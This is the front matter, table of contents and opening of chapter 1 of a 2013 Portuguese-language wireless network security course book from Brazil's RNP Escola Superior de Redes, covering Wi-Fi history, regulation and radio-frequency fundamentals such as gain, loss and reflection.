Segurança em

Redes sem Fio

Ronaldo Vasconcellos

A RNP – Rede Nacional de Ensino e Pesquisa – é qualificada como uma Organização Social (OS), sendo ligada ao Ministério da Ciência, Tecnologia e Inovação (MCTI) e responsável pelo Programa Interministerial RNP, que conta com a participação dos ministérios da Educação (MEC), da Saúde (MS) e da Cultura (MinC). Pioneira no acesso à Internet no Brasil, a RNP planeja e mantém a rede Ipê, a rede óptica nacional acadêmica de alto desempenho. Com Pontos de Presença nas 27 unidades da federação, a rede tem mais de 800 instituições conectadas. São aproximadamente 3,5 milhões de usuários usufruindo de uma infraestrutura de redes avançadas para comunicação, computação e experimentação, que contribui para a integração entre o sistema de Ciência e Tecnologia, Educação Superior, Saúde e Cultura.

Ministério da Cultura Ministério da Saúde Ministério da Educação Ministério da Ciência, Tecnologia e Inovação

Segurança em

Redes sem Fio

Ronaldo Vasconcellos

Segurança em

Redes sem Fio
Ronaldo Vasconcellos

Rio de Janeiro Escola Superior de Redes 2013

Copyright © 2013 – Rede Nacional de Ensino e Pesquisa – RNP Rua Lauro Müller, 116 sala 1103 22290-906 Rio de Janeiro, RJ

Diretor Geral Nelson Simões Diretor de Serviços e Soluções José Luiz Ribeiro Filho

Escola Superior de Redes
Coordenação Luiz Coelho Edição Pedro Sangirardi Revisão Lincoln da Mata Revisão Técnica Frederico Costa Coordenação Acadêmica de Segurança e Governança de TI Edson Kowask Equipe ESR (em ordem alfabética) Celia Maciel, Cristiane Oliveira, Derlinéa Miranda, Elimária Barbosa, Evellyn Feitosa, Felipe Nascimento, Lourdes Soncin, Luciana Batista, Luiz Carlos Lobato, Renato Duarte, Sergio Ricardo de Souza e Yve Abel Marcial. Capa, projeto visual e diagramação Tecnodesign Versão

1.3.0

Este material didático foi elaborado com fins educacionais. Solicitamos que qualquer erro encontrado ou dúvida com relação ao material ou seu uso seja enviado para a equipe de elaboração de conteúdo da Escola Superior de Redes, no e-mail info@esr.rnp.br. A Rede Nacional de Ensino e Pesquisa e os autores não assumem qualquer responsabilidade por eventuais danos ou perdas, a pessoas ou bens, originados do uso deste material. As marcas registradas mencionadas neste material pertencem aos respectivos titulares. Distribuição

Escola Superior de Redes

Rua Lauro Müller, 116 – sala 1103 22290-906 Rio de Janeiro, RJ http://esr.rnp.br info@esr.rnp.br

Dados Internacionais de Catalogação na Publicação (CIP) Vasconcellos, Ronaldo. V331t Segurança em Redes sem Fio / Ronaldo Vasconcellos. – Rio de Janeiro: RNP/ESR, 2013. 200 p. : il. ; 28 cm. Bibliografia: p. 181-182. ISBN 978-85-63630-30-8

1. Fundamentos da radiofrequência. 2. Redes sem fio. 3. Comutação por pacotes (Transmissão de dados). 4. Seleção de padrões. I. Título CDD 004.65

Sumário
Escola Superior de Redes
A metodologia da ESR xiii Sobre o curso  xiv A quem se destina xiv Convenções utilizadas neste livro xiv Permissões de uso xv Sobre os autores xvi

1. História, padrões e fundamentos de radiofrequência
Introdução  1 Exercício de nivelamento 1 – História, padrões e fundamentos de radiofrequência 1 Classificação de redes por área de cobertura 2 WLAN 3 Regulamentação 3 Papel da WLAN 3 Os sete principais papéis da WLAN 4 Fundamentos de radiofrequência 4 Ganho e perda de sinal 5 Causas de perda 6 Reflexão 6 Espalhamento 6 Difração 7 Refração 7 LOS 8 VSWR 9 iii

Antenas – Ganho 9 Potência de radiação 10 Equivalent Isotropically Radiated Power (EIRP) 10 Matemática RF 11 Exercício de fixação 1 – Fundamentos de radiofrequência 11 Tecnologias de transmissão 12 Implementações de Spread Spectrum 12 Direct Sequence Spread Spectrum (DSSS) 13 Orthogonal Frequency Division Multiplexing (OFDM) 14 Exercício de fixação 2 – Tecnologias de transmissão 16 Organizações e padrões 16 Padrões Wi-Fi Alliance  16 WPA  16 WPA2 17 Padrões IETF 18 Padrões IEEE 18 Padrões IEEE 802.11  19 Padrões 802.11 inexistentes  20 Tendências 20 Wi-Fi e telefonia IP 20 Wi-Fi a bordo 21 Padrão 802.11n 21 Roteiro de Atividades 1 23 Atividade 1.1 – Matemática RF 23 Atividade 1.2 – Órgãos reguladores 23 Atividade 1.3 – IEEE 802.11n 23 Atividade 1.4 – WPA2 e RSN 24 Atividade 1.5 – Projeto de WLAN com intersecção de células 24

2. WLAN: equipamentos
e configuração
Introdução 25 Exercício de nivelamento 1 – WLAN 25 Acess Point 26

iv

Clientes WLAN 26 Conceitos sobre antenas 27 Antena Omnidirecional (dipolo) 28 Antena Semidirecional 28 Antena altamente direcional 29 Amplificadores  29 Atenuadores 29 Splitter 29 Conectores 30 Cabos 30 Exercício de fixação 1 – WLAN: equipamentos e acessórios 30 Configuração de clientes 31 Windows 31 Linux 32 Roteiro de Atividades 2 35 Atividade 2.1 – Configuração de um cliente Windows 35 Atividade 2.2 – Configuração de um cliente Linux 39

3. Auditoria em redes sem fio (parte 1)
Introdução 49 Ataques a redes sem fio 49 Concepções erradas 49 Segurança física 51 Wardriving 51 Piggybacking 52 Warflying 52 DEFCON Wifi Shootout Contest 53 Divulgação de informações 53 Negação de serviço 53 Access points rogue 54 Outros ataques 54 Tráfego 802.11 55 Arquitetura IBSS 55 802.1x 56 IEEE 802.11 57 Quadros 802.11  59

v

Captura 59 Modos de operação das interfaces de rede 60 Roteiro de Atividades 3 61 Atividade 3.1 – Captura e análise de tráfego em sistemas Windows 61 Atividade 3.2 – Captura e análise de tráfego em sistemas Linux 62 Atividade 3.3 – Vazamento de informações em redes Wi-Fi  65

4. Auditoria em redes sem fio (parte 2)
Introdução 67 Exercício de nivelamento 1 – Ataques a redes sem fio 67 Metodologias de auditoria 67 Fingerprinting do AP 69 Fingerprinting passivo  69 Fingerprinting ativo 69 Processamento de informações coletadas 69 Identificação de métodos de segurança  70 Mapeamento externo 70 Mapeamento interno 71 Avaliação do tráfego 72 Avaliação de tráfego cifrado 72 Análise da camada MAC 73 Avaliação de tráfego cifrado 73 Exercício de fixação 1 – Metodologias de auditoria 73 Ferramentas de auditoria 73 Wireshark 74 Kismet 75 NetStumbler 76 GPSMAP 77 Roteiro de Atividades 4 79 Atividade 4.1 – NetStumbler no Windows e suas funcionalidades 79 Atividade 4.2 – Kismet no Linux e suas funcionalidades 79 Atividade 4.3 – Demonstração de injeção de tráfego na rede 82

vi

5. Redes rogue e ataques DoS
Introdução 85 Exercício de nivelamento 1 – Redes rogue  85 Problemas agravantes 86 Tipos de rogue 86 Técnicas de identificação de rogues 86 Rede cabeada: Fingerprinting do AP 87 Rede cabeada: análise do prefixo MAC 87 Warwalking 88 Monitoração da rede por clientes 89 Rede sem fio: IDS na WLAN 90 Intrusion Prevention System (IPS) 91 Localizando rogues por análise de SNR 91 Etapas da localização por SNR 92 Criando um AP rogue sob Linux 93 Exercício de fixação 1 – Redes rogue 93 Denial of Service (DoS) 94 Tipos de ataque DoS contra redes 802.11 94 Ataque contra a camada física 94 Ataques à camada MAC 802.11 95 Ataque persistente: flood de autenticação ou associação 95 Ataque não persistente: flood de desautenticação 97 Ataque não persistente: autenticação inválida 98 Ataque não persistente: reserva do meio 98 Ataque não persistente: problemas de CSMA/CA 99 DoS e IEEE 802.11 99 Medidas de defesa 100 Roteiro de Atividades 5 101 Atividade 5.1 – Identificando APs na rede cabeada 101 Atividade 5.2 – Realizando um ataque de Negação de Serviço em 802.11 102 Atividade 5.3 – Exercício opcional 104 Atividade 5.4 – Um ataque rogue completo 104

vii

6. Redes WEP-PSK
Introdução 107 Wired Equivalent Privacy (WEP) 107 Chaves WEP 108 WEP no quadro 802.11 108 Processo de cifragem WEP 109 Problemas de WEP 111 Sem proteção contra replay 111 Verificação fraca de integridade 111 Sem mecanismo de rotação de chaves 112 Vetor de inicialização muito curto 113 Fase de desafio-resposta revela o PRGA 113 Ataques contra WEP 114 Ataque de dicionário 114 Algoritmo de geração de chaves Neesus Datacom  115 Auditando redes com WEP 116 Etapas da auditoria 117 Melhorando a segurança de redes WEP 117 Migrar para um método de segurança mais forte 118 Roteiro de Atividades 6 119 Atividade 6.1 – Capturando pacotes cifrados com WEP com ferramentas Aircrack-ng 119 Atividade 6.2 – Recuperando uma chave WEP utilizando o Aircrack-ng 121 Atividade 6.3 – Decifrando tráfego WEP  123

7. Redes WPA-PSK
Introdução 125 WPA 126 TKIP – MIC 126 WEP 127 Michael 127 TKIP – sequência do IV 128 Ataques de replay: como TKIP resolveu o problema 128 Rekeying  128 Rekeying – a solução de WPA 129

viii

Key Mixing  129 Key Mixing – solução de WPA  130 TKIP – 4-Way Handshake 130 Identificando redes WPA-PSK 134 Filtro de Wireshark  134 Ataques contra WPA-PSK 135 Melhorando a segurança de WPA-PSK 135 Vulnerabilidades do TKIP 136 WPA2 136 Roteiro de Atividades 7 137 Atividade 7.1 – Descobrindo a chave WPA-PSK por ataque de dicionário 137 Atividade 7.2 – Descobrindo a chave WPA-PSK por ataque de dicionário de maneira muito mais rápida 138 Atividade 7.3 – Realizando um ataque contra a rede do laboratório 139

8. Sistemas de detecção de intrusões (IDS) em redes WLAN
Introdução 141 Sistemas de detecção de intrusos (IDS) em redes WLAN  141 Termos importantes  142 Modelos de implantação 143 Cobertura 143 Implantação integrada  144 Métodos de detecção 144 Análise de assinaturas  145 Análise de tendências 145 Análise de anomalias  145 Avaliando soluções de IDS 146 Características importantes 147 IDS distribuído com Kismet 147 Drones Kismet  148 Alertas e detecção de intrusões 148 Tipos de alerta – assinatura (12 tipos) 149 Tipos de alerta – tendências (10 tipos)  150 Prática de Kismet como IDS Distribuído 151

ix

Roteiro de Atividades 8 153 Atividade 8.1 – Configurando o Kismet Drone 154 Atividade 8.2 – Configurando o Kismet Server 154 Atividade 8.3 – Cobrindo todos os canais 155 Atividade 8.4 – Alertas 156

9. Implantando uma WLAN segura (parte 1)
Introdução 157 Segurança padrão no AP 157 Segurança sem fio 158 Configurações de segurança 159 Atualização de firmware 160 AP mais seguro com OpenWRT 161 OpenWRT  162 Vantagens do OpenWRT 162 Instalação passo a passo 163 Instalação do firmware pela interface administrativa web 165 Roteiro de Atividades 9 167 Atividade 9.1 – Configurações gerais de desempenho e segurança 167 Atividade 9.2 – Configurando um AP com WPA ou WPA2 Personal 168 Atividade 9.3 – Configurações extras de segurança e desempenho 169

10. Implantando uma WLAN segura (parte 2)
Introdução 171 Nível atual de segurança 171 Arquitetura de autenticação 172 802.1x e FreeRADIUS 173 Por que EAP-TLS? 174 Desvantagens de EAP-TLS 174 Conclusão 175 Cenário atual 176

x

Roteiro de Atividades 10 177 Atividade 10.1 – Autenticação RADIUS 177 Atividade 10.2 – Configuração do AP com WPA2 Enterprise 177 Atividade 10.3 – Testando a autenticação 178 Atividade 10.4 – Arquivos de configuração do RADIUS 178

Bibliografia  181

xi

xii

Escola Superior de Redes
A Escola Superior de Redes (ESR) é a unidade da Rede Nacional de Ensino e Pesquisa (RNP) responsável pela disseminação do conhecimento em Tecnologias da Informação e Comunicação (TIC). A ESR nasce com a proposta de ser a formadora e disseminadora de competências em TIC para o corpo técnico-administrativo das universidades federais, escolas técnicas e unidades federais de pesquisa. Sua missão fundamental é realizar a capacitação técnica do corpo funcional das organizações usuárias da RNP, para o exercício de competências aplicáveis ao uso eficaz e eficiente das TIC. A ESR oferece dezenas de cursos distribuídos nas áreas temáticas: Administração e Projeto de Redes, Administração de Sistemas, Segurança, Mídias de Suporte à Colaboração Digital e Governança de TI. A ESR também participa de diversos projetos de interesse público, como a elaboração e execução de planos de capacitação para formação de multiplicadores para projetos educacionais como: formação no uso da conferência web para a Universidade Aberta do Brasil (UAB), formação do suporte técnico de laboratórios do Proinfo e criação de um conjunto de cartilhas sobre redes sem fio para o programa Um Computador por Aluno (UCA).

A metodologia da ESR
A filosofia pedagógica e a metodologia que orientam os cursos da ESR são baseadas na aprendizagem como construção do conhecimento por meio da resolução de problemas típicos da realidade do profissional em formação. Os resultados obtidos nos cursos de natureza teórico-prática são otimizados, pois o instrutor, auxiliado pelo material didático, atua não apenas como expositor de conceitos e informações, mas principalmente como orientador do aluno na execução de atividades contextualizadas nas situações do cotidiano profissional. A aprendizagem é entendida como a resposta do aluno ao desafio de situações-problema semelhantes às encontradas na prática profissional, que são superadas por meio de análise, síntese, julgamento, pensamento crítico e construção de hipóteses para a resolução do pro blema, em abordagem orientada ao desenvolvimento de competências. Dessa forma, o instrutor tem participação ativa e dialógica como orientador do aluno para as atividades em laboratório. Até mesmo a apresentação da teoria no início da sessão de aprendizagem não é considerada uma simples exposição de conceitos e informações. O instrutor busca incentivar a participação dos alunos continuamente.

xiii

As sessões de aprendizagem onde se dão a apresentação dos conteúdos e a realização das atividades práticas têm formato presencial e essencialmente prático, utilizando técnicas de estudo dirigido individual, trabalho em equipe e práticas orientadas para o contexto de atuação do futuro especialista que se pretende formar. As sessões de aprendizagem desenvolvem-se em três etapas, com predominância de tempo para as atividades práticas, conforme descrição a seguir: Primeira etapa: apresentação da teoria e esclarecimento de dúvidas (de 60 a 90 minutos). O instrutor apresenta, de maneira sintética, os conceitos teóricos correspondentes ao tema da sessão de aprendizagem, com auxílio de slides em formato PowerPoint. O instrutor levanta questões sobre o conteúdo dos slides em vez de apenas apresentá-los, convidando a turma à reflexão e participação. Isso evita que as apresentações sejam monótonas e que o aluno se coloque em posição de passividade, o que reduziria a aprendizagem. Segunda etapa: atividades práticas de aprendizagem (de 120 a 150 minutos). Esta etapa é a essência dos cursos da ESR. A maioria das atividades dos cursos é assíncrona e realizada em duplas de alunos, que acompanham o ritmo do roteiro de atividades proposto no livro de apoio. Instrutor e monitor circulam entre as duplas para solucionar dúvidas e oferecer explicações complementares. Terceira etapa: discussão das atividades realizadas (30 minutos). O instrutor comenta cada atividade, apresentando uma das soluções possíveis para resolvê-la, devendo ater-se àquelas que geram maior dificuldade e polêmica. Os alunos são convidados a comentar as soluções encontradas e o instrutor retoma tópicos que tenham gerado dúvidas, estimulando a participação dos alunos. O instrutor sempre estimula os alunos a encontrarem soluções alternativas às sugeridas por ele e pelos colegas e, caso existam, a comentá-las.

Sobre o curso
O curso tem por objetivo capacitar o participante para a realização da segurança do ambiente wireless da sua organização. Serão ensinados os fundamentos de radiofrequência e identificados os principais protocolos e normas envolvidas na comunicação Wi-Fi. Com ênfase em redes Wi-Fi (IEEE 802.11a/b/g/n), serão apresentados os riscos que ameaçam este tipo de rede, e técnicas para mitigá-los com uso de ferramentas baseadas em Linux e Windows. Serão desenvolvidas as competências para a estruturação de uma rede sem fio de forma segura e atendendo a todos os requisitos necessários para impedir os principais ataques. O aluno será ainda familiarizado com ferramentas livres para verificação da rede e realização de auditorias de segurança.

A quem se destina
O curso é destinado aos profissionais de segurança, auditores e administradores de rede. Profissionais de outras áreas podem participar, desde que tenham realizado o curso Tecnologias de Redes sem Fio, oferecido pela ESR, ou possuam conhecimento equivalente.

Convenções utilizadas neste livro
As seguintes convenções tipográficas são usadas neste livro: Itálico Indica nomes de arquivos e referências bibliográficas relacionadas ao longo do texto.

xiv

Largura constante
Indica comandos e suas opções, variáveis e atributos, conteúdo de arquivos e resultado da saída de comandos. Comandos que serão digitados pelo usuário são grifados em negrito e possuem o prefixo do ambiente em uso (no Linux é normalmente # ou $, enquanto no Windows é C:\).

Conteúdo de slide
Indica o conteúdo dos slides referentes ao curso apresentados em sala de aula.

Símbolo
Indica referência complementar disponível em site ou página na internet.

Símbolo
Indica um documento como referência complementar.

Símbolo
Indica um vídeo como referência complementar.

Símbolo
Indica um arquivo de aúdio como referência complementar.

Símbolo
Indica um aviso ou precaução a ser considerada.

Símbolo
Indica questionamentos que estimulam a reflexão ou apresenta conteúdo de apoio ao entendimento do tema em questão.

Símbolo
Indica notas e informações complementares como dicas, sugestões de leitura adicional ou mesmo uma observação.

Permissões de uso
Todos os direitos reservados à RNP. Agradecemos sempre citar esta fonte quando incluir parte deste livro em outra obra. Exemplo de citação: TORRES, Pedro et al. Segurança em Redes sem Fio. Rio de Janeiro: Escola Superior de Redes, RNP, 2013.

Comentários e perguntas
Para enviar comentários e perguntas sobre esta publicação: Escola Superior de Redes RNP Endereço: Av. Lauro Müller 116 sala 1103 – Botafogo Rio de Janeiro – RJ – 22290-906 E-mail: info@esr.rnp.br

xv

Sobre os autores
Ronaldo Vasconcellos é formado em Análise de Sistemas (PUC Campinas), com especialização em redes (IC Unicamp) e certificações GIAC Certified Incident Handler (GCIH) e GIAC Assessing and Auditing Wireless Networks (GAWN). Trabalha com segurança computacional desde 2002 (seis anos na área de Resposta a Incidentes Computacionais), e desde 2010 na área de pesquisa em Ameaças Cibernéticas e Cibercrime, com foco no Brasil e Ibero-América. Frederico Costa atua há 15 anos na área de administração de redes e segurança da informação. Seu foco de atuação é segurança de infraestrutura e monitoramento de redes. Atualmente é coordenador de segurança no Centro de Atendimento a Incidentes de Segurança da Rede Nacional de Ensino e Pesquisa (CAIS/RNP). Possui certificação GPEN e já ministrou cursos práticos (hands-on) focados em segurança da informação, no Brasil e no exterior. Além disso, atualmente é membro de um grupo de trabalho da OEA para elaboração de exercícios cibernéticos voltados a respostas a incidentes de segurança, e também lidera uma iniciativa para o estabelecimento de infraestrutura de monitoramento para as redes acadêmicas da América Latina, no âmbito das ações do GT-CSIRT/RedCLARA. Edson Kowask Bezerra é profissional da área de segurança da informação e governança há mais de quinze anos, atuando como auditor líder, pesquisador, gerente de projeto e gerente técnico, em inúmeros projetos de gestão de riscos, gestão de segurança da informação, continuidade de negócios, PCI, auditoria e recuperação de desastres em empresas de grande porte do setor de telecomunicações, financeiro, energia, indústria e governo. Com vasta experiência nos temas de segurança e governança, tem atuado também como palestrante nos principais eventos do Brasil e ainda como instrutor de treinamentos focados em segurança e governança. É professor e coordenador de cursos de pós-graduação na área de segurança da informação, gestão integrada, de inovação e tecnologias web. Hoje atua como Coordenador Acadêmico de Segurança e Governança de TI da Escola Superior de Redes.

xvi

1
História, padrões e fundamentos de radiofrequência
objetivos
Apresentar breve histórico das redes sem fio (ou Wi-Fi); mostrar as organizações envolvidas na padronização de redes sem fio e as principais normas adotadas; descrever as tecnologias de transmissão e fundamentos de radiofrequência relevantes para o auditor de redes sem fio.

conceitos

Os fundamentos de radiofrequência, Matemática RF, organizações e hotplug.

Introdução
11 WLAN: redes locais sem fio. 11 Fundamentos de radiofrequência. 11 Tecnologias de transmissão. 11 Organizações e padrões. 11 Tendências.

q

O que é rede sem fio?

O Capítulo 1 tem teor introdutório, apresentando breve histórico das redes sem fio, fun damentos de radiofrequência, tecnologias de transmissão (FHSS, DSSS, OFDM e MIMO) e organizações envolvidas na padronização e regulamentação de redes sem fio no mundo. Ao final do capítulo, é traçado um panorama do mercado de redes sem fio com foco em redes WLAN e WMAN, e apresentadas tendências e tecnologias emergentes. 11 Comunicação entre dispositivos sem o uso de cabos. 11 Engloba desde sistemas simples, tais como microfones sem fio, até redes locais sem fio (WLAN).

q

Capítulo 1 - História, padrões e fundamentos de radiofrequência

Exercício de nivelamento 1 e História, padrões e fundamentos de radiofrequência

1

11 Recebem e transmitem informações usando ondas eletromagnéticas (EM). 11 Comprimentos de onda que vão de 9 kilohertz (kHz) a centenas de Gigahertz (GHz). Redes sem fio estão por toda a parte. Embora redes de computadores sem fio sejam um tópico recente, outros tipos de rede sem fio estão presentes em nossas vidas há muito tempo: microfones sem fio, rádio AM e FM, celulares GSM, infravermelho, entre outros. Frequências de transmissão de algumas dessas redes: 11 Very Low Frequency (VLF): 9-30 kHz; 11 Low Frequency (LF): 30-300 kHz; 11 Medium Frequency (MF): 300 kHz-3 MHz: estações de rádio AM (535 kHz-1 MHz); 11 High Frequency (HF): 3 MHz-30 MHz; 11 Very High Frequency (VHF): 30 MHz-300 MHz: estações de rádio FM, telefones sem fio e controle remoto de garagem; 11 Ultra High Frequency (UHF): 300 MHz-3 GHz, WLAN (2.4 GHz), Bluetooth, sistemas de

q

pager, celulares 1G, 2G e 3G, Global System for Mobile Communication (GSM), Enhanced Data Rates for Global Evolution (EDGE); 11 Super High Frequency (SHF): WLAN (5.8 GHz); 11 Extremely High Frequency (EHF): 30 GHz-300 GHz; comunicação de satélites; 11 Infrared (IR): comunicação por infravermelho entre periféricos. Apesar de muitas e diversas, são normalmente classificadas por sua área de cobertura: 11 WWAN: 3G, EV-DO/EV-DV. 11 WMAN: WiMAX, baseado no padrão IEEE 802.16. 11 WLAN: baseado em IEEE 802.11, produtos certificados como Wi-Fi. 11 WPAN: bluetooth (IEEE 802.15.1) e IR (Infrared). Foco deste curso: WLAN, padrões IEEE 802.11 e padrões associados (IEEE 802.1X).

q

Classificação de redes por área de cobertura
Redes sem fio são classificadas por sua área de abrangência, tal como as redes cabeadas. Redes locais, denominadas Local Area Network (LAN), passam a ser chamadas de Wireless Local Area Network (WLAN). WLAN e padrões associados são o foco deste curso. 11 Wireless Wide Area Network (WWAN): atualmente representada por tecnologias como 3G, 802.20 (MBWA – Mobile Broadband Wireless Access) e EV-DO/EV-DV. 11 Wireless Metropolitan Area Network (WMAN): atualmente todas as atenções estão voltadas para o padrão IEEE 802.16, impulsionado pelo WiMAX Forum. A denominação
Segurança em Redes sem Fio

WiMAX, acrônimo para Worldwide Interoperability for Microwave Access, indica que o produto foi certificado de maneira independente pelo WiMAX Forum, de maneira que seja garantida a interoperabilidade entre fornecedores. Essa classe de redes possui alcances metropolitanos, com mobilidade (IEEE 802.16e), e complementa os padrões de IEEE 802.11, com enfoque em redes locais. 11 Wireless Local Area Network (WLAN): veremos os padrões 802.11 mais adiante em detalhes, uma vez que são o foco deste curso.

2

11 Wireless Personal Area Network (WPAN): o padrão Bluetooth (IEEE 802.11.1-2002 Bluetooth 1.1/802.11.1-2005 Bluetooth 1.2), hoje muito popular em celulares, foi criado para interconectar celulares, PDAs (Personal Digital Assistants) e PCs de maneira fácil e sem fio. Tem mostrado, com suas vulnerabilidades, o quanto a indústria não aprendeu com os erros do início do desenvolvimento dos padrões de redes Wi-Fi.

WLAN
11 Rede local sem fio (Wireless Local Area Network – WLAN). 11 Wi-Fi: certificação de interoperabilidade. 11 Mercado em constante expansão. 11 Presente em todo laptop. 11 Celulares, câmeras digitais, PDAs, televisores e consoles portáteis de videogame.

q

w Wi-Fi
Para mais informações sobre Wi-Fi Alliance, acesse: http://www.wi-fi.org

Marca criada em 2000 com assessoria da Interbrand, empresa de consultoria de marcas que criou marcas conhecidas como Prozac, Imation (3M) e Compaq. A Wi-Fi Alliance certifica a interoperabilidade entre equipamentos que não são padrões, como o Institute of Electrical and Electronics Engineers (IEEE). De acordo com Phil Belanger, membro fundador da organização, “Wireless Fidelity” não significa nada. Foi apenas uma tentativa de juntar duas palavras, Wi e Fi. Até 2002, o nome da aliança era Wireless Ethernet Compatibility Alliance (WECA).

Regulamentação
11 WLAN é regulamentada nos EUA pela Federal Communications Commission (FCC) e, no Brasil, pela Agência Nacional de Telecomunicações (Anatel). 11 Ainda restritas ao papel de ponto de entrada em uma rede cabeada: velocidade baixa e resistência a falhas. 11 Atualmente custa menos do que uma rede cabeada. Nos Estados Unidos, a frequência utilizada pelas WLAN (IEEE 802.11) é regulamentada pela Federal Communications Commission (FCC). No Brasil, a Anatel tem o papel regulador da FCC. As redes Wi-Fi não precisam de autori -

q

zação da Anatel para operar, mas devem estar de acordo com as condições de uso da Reso lução 506 (2008). Trataremos das potências de transmissão em um dos próximos tópicos. A resolução 506 atualiza a resolução nº 365, de 10 de maio de 2004.

Papel da WLAN
Como veremos no decorrer do curso, um dos principais elementos de uma rede sem fio é o Wireless Access Point (WAP), popularmente chamado de AP. Trata-se do elemento da rede que tem o papel de ponto de entrada na rede cabeada, mas frequentemente oferece outras funcionalidades, tais como controle de acesso, firewall, Network Address Translation (NAT), entre outras. É importante que, diante de tantos padrões de rede sem fio emergentes – WiMAX, EV-DO, Bluetooth e outros – se entenda bem o papel das redes WLAN 802.11. WiMAX não foi desenvolvido para substituir Wi-Fi, mas sim para complementar essa tecnologia.

Capítulo 1 - História, padrões e fundamentos de radiofrequência

3

Redes 802.11 continuarão a exercer seu papel na rede local (LAN), já tecnologias como WiMAX e EV-DO serão a solução mais adequada quando os requisitos tiverem ênfase maior em abrangência e mobilidade.

w
Mais informações em: US Frequency Allocation Chart (http://www.ntia. doc.gov/osmhome/ allochrt.pdf ) e Anatel – Resolução nº 506, de 1º de julho de 2008, que republica o Regulamento sobre Equipamentos de Radiocomunicação de Radiação Restrita: http:// www.anatel.gov.br

Os sete principais papéis da WLAN
11 Acesso. 11 Extensão da rede. 11 Última milha. 11 Mobilidade. 11 Conectividade de prédio a prédio. 11 Small Office Home Office (SOHO). 11 Escritório móvel. Existem diversos motivos que impulsionam uma organização a implantar uma WLAN, que podem envolver desde custo até impossibilidade de instalação de cabos. Alguns papéis típicos da WLAN numa organização: 11 Acesso: ponto de entrada na rede cabeada com ênfase em mobilidade;

q

11 Extensão da rede: extensão da rede cabeada sem a necessidade de instalação de cabos; 11 Última milha: infraestrutura de provimento de acesso ao usuário final, de um Internet Service Provider (ISP) ao cliente. WiMAX tende a ocupar esse papel, uma vez que é uma tecnologia mais apropriada para grandes áreas de abrangência; 11 Mobilidade: quando mobilidade é mais importante que velocidade e qualidade do serviço, a WLAN pode ser uma tecnologia a ser considerada; 11 Conectividade prédio a prédio: uso de equipamentos voltados ao mercado SOHO, mas com uso de antenas direcionais, por exemplo. É o caso da ligação entre duas LAN em prédios próximos por meio de dois APs em modo bridge; 11 SOHO: para ambientes em que a velocidade do acesso não é requisito primordial, no caso de poucos clientes de acesso. Pequenos escritórios, funcionários que trabalham em regime de home office e usuários domésticos: o chamado mercado SOHO (Small Office/ Home Office) se encaixa nesse perfil. A maioria dos equipamentos 802.11 disponíveis em lojas de eletrônicos se enquadram na categoria SOHO; 11 Escritório móvel: montagem de estandes em eventos, extensão da rede sem a necessi dade de gastar tempo e dinheiro com cabeamento.

Fundamentos de radiofrequência
11 Sinais de corrente alternada (AC) de alta frequência.
Segurança em Redes sem Fio

q

11 Irradiados pelo ar na forma de ondas de rádio com o auxílio de antenas. 11 Ondas se propagam seguindo certos princípios de física, que abordaremos neste Capítulo. 11 Propagação das ondas depende do tipo de antena: 22 Omnidirecional. 22 Semidirecional. 22 Altamente direcional.

4

Sinais de rádio são irradiados pelo ar com a ajuda de antenas, componentes muito importantes no projeto de uma rede sem fio. Antenas inadequadas podem restringir o alcance do sinal, da mesma forma que o uso de cabos e conectores inadequados podem atenuar o sinal Alternate Current (AC) e prejudicar a transmissão e a recepção de dados. Neste capítulo, serão abordados fundamentos de radiofrequência (RF) importantes para planejamento e auditoria de redes sem fio. Conhecendo alguns conceitos básicos de física, sobre propagação de ondas eletromagnéticas, o aluno será capaz de resolver problemas do dia a dia de um administrador de redes sem fio, como por exemplo: 11 Problemas de conectividade; 11 Escolha de um melhor posicionamento do AP (site survey); 11 Localizar um AP rogue. 11 Propagação inconsistente. 11 Interferências externas. 11 Comportamento: 22 Diferenças de impedância entre cabos e conectores provocam perda de sinal. 22 Ganho e perda de sinal. 22 Reflexão, refração, difração e espalhamento. A radiofrequência (RF) é chamada de fumaça e espelhos (“smoke & mirrors”) por seu com portamento errático e inconsistente. Diversos fatores podem afetar o comportamento de ondas de rádio, tais como: 11 Interferências externas: outras fontes de sinais de rádio, Bluetooth (802.15.1), fornos de micro-ondas, telefones sem fio, entre outras aplicações que utilizem sinais de rádio em frequências iguais ou próximas às de Wi-Fi (2.4 GHz). 11 Pode ocorrer ganho no sinal pelo uso de antenas e amplificadores AC. De maneira contrária, o comportamento do sinal pode causar perda de sinal se houver diferença de impedância entre cabos e conectores. 11 Perda de sinal por fenômenos físicos que afetam a intensidade, o trajeto e outras caracte Capítulo 1 - História, padrões e fundamentos de radiofrequência

q

rísticas das ondas de rádio.

Ganho e perda de sinal
Ganho: 11 Unidade: dBi. 11 Aumento na amplitude de um sinal de RF. 11 Normalmente é um processo ativo, mas pode ser passivo por sinais refletidos. Perda: 11 Diminuição na força de um sinal RF, inversamente proporcional à distância percorrida. 11 Diversos fatores podem causar perda. Aumentar a potência do sinal pode produzir consequências positivas ou negativas. Como podemos constatar em experimentos com OpenWRT, aumentar a potência do Intentional

q

Radiator (IR), a potência do transmissor, levando em conta perdas e ganhos de cabos ou conectores e antenas – no caso da interface de rede do Access Point –, pode aumentar o ruído do sinal.

5

O ganho de uma antena é passivo e medido em dBi, ou seja, decibéis com um radiador isotrópico (como o sol). Isso significa que uma antena altera o padrão de radiação, não aumentando a potência de entrada do sinal. A perda em um sinal RF ocorre principalmente pela dispersão do sinal; à medida que o sinal trafega pelo ar, sua potência diminui a uma taxa inversamente proporcional à distância percorrida. Para efeito de ilustração, depois de percorrer 100 metros, um sinal de RF normal mente sofre uma perda de cerca de 80 dB. Se o sinal percorre mais 100 metros, a perda é de cerca de 86 dB. A perda (path loss) é expressa pela seguinte fórmula: Perda (dB) = 32,5 + 20 log F + log d Onde: “F” é a frequência e “d” é a distância em metros.

Causas de perda
Reflexão
11 Similar à reflexão da luz. 11 Sinal pode se manter o mesmo. 11 Multipath: múltiplas reflexões.

q

Ângulo de incidência é igual ao ângulo de reflexão i r

Objeto

Imagem virtual

i r

i ray box r A imagem parece estar por trás do espelho
Figura 1.1 Exemplo de reflexão.

Reflexões ocorrem quando o objeto é grande, comparado com o comprimento da onda. Por mais lisa e regular que seja a superfície – do ponto de vista macroscópico – sempre haverá perda, seja por absorção ou por espalhamento do sinal. A reflexão de sinais de RF é semelhante à da luz, ou seja, o ângulo de incidência (entre o sinal que chega e a superfície) é o mesmo do ângulo de reflexão (entre o sinal e a superfície em que refletiu) se não houver irregularidades na superfície.

l
